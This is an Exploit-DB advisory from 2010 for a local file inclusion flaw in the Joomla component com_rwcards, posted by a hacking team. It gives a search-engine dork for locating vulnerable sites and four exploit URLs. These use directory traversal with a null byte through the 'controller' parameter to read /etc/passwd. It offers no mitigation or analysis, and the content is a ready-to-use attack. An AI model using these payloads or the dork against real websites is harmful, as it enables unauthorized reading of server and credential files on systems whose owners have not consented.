Joomla! Component com_rwcards - Local File Inclusion

EDB-ID:

11772

CVE:

N/A

Author:

ALTBTA

Type:

webapps

Platform:

PHP

Published:

2010-03-16

####################################################################
>>>>> Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
>>>>> Team : Sec Attack Team
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
>>>>> Script : Joomla Component com_rwcards
>>>>> Bug Type : Local File Inclusion [LFI]
>>>>> Dork : inurl:"com_rwcards"

####################################################################

===[ Exploit ]===

http://site/index.php?option=com_rwcards&view=rwcards&controller=[LFI]
http://site/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../etc/passwd%00

and

http://site/index.php?option=com_rwcards&controller=[LFI]
http://site/index.php?option=com_rwcards&controller=../../../../../../../../../../etc/passwd%00

####################################################################
RxH & &#1575;&#1576;&#1608; &#1593;&#1584;&#1575;&#1576;